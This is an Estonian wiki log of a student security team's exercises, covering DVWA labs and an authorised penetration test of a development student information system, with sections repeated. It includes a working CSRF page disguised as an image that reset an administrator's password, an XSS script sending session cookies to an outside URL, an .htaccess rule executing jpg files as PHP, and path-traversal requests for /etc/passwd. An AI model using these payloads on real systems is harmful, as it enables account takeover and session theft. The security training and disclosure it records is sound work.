==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev ==

=== Alo tegevus ===
Lihtsalt url modifitseerimisega leidsime mittekaitstud lingi:

Õppesoorituste all on võimalik laadida alla kõikide kasutajate õpingukaardid (lihtsalt tuleb otsida üles soovitud kasutaja student_id)
Arvete alt peaks ka võimalik sama viga ära kasutada, aga kuna ühtegi arvet hetkel süsteemis polnud ei olnud võimalik seda viga kinnitada.

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
===Burp suite===

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

==Nessuse algkäivitamine==
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Tegijad ==
Alo Konno<br>
Urmo Lihten<br>
Taavi Podžuks<br>
Matis Alliksoo<br>
Sander Saarm

Security team

2012-03-30T09:27:56Z

Ulihten: /* Security Team tegevusplaan */

== 1. päev - Materjalidga tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]]

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev<br>
1.1 Tutvuda OWASP’iga. <br>
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.<br>
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.<br>
2. Päev<br>
2.1 Esitada tiimi tegevusplaan.<br>
2.2 Tutvuda turvariskidega natuke põhjalikumalt.<br>
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.<br>
2.4 Täiendada esimese päeva ettekannet.<br>
3. Päev<br>
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.<br>
3.2 Saadud tulemuste dokumenteerimine.<br>
4. Päev<br>
4.1 Saadud tulemuste esitlemine ettekandega<br>
5. Päev<br>
5.1 Tulemuste parandamine wiki’s.<br>

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.
Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev ==

=== Alo tegevus ===
Lihtsalt url modifitseerimisega leidsime mittekaitstud lingi:

Õppesoorituste all on võimalik laadida alla kõikide kasutajate õpingukaardid (lihtsalt tuleb otsida üles soovitud kasutaja student_id)
Arvete alt peaks ka võimalik sama viga ära kasutada, aga kuna ühtegi arvet hetkel süsteemis polnud ei olnud võimalik seda viga kinnitada.

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

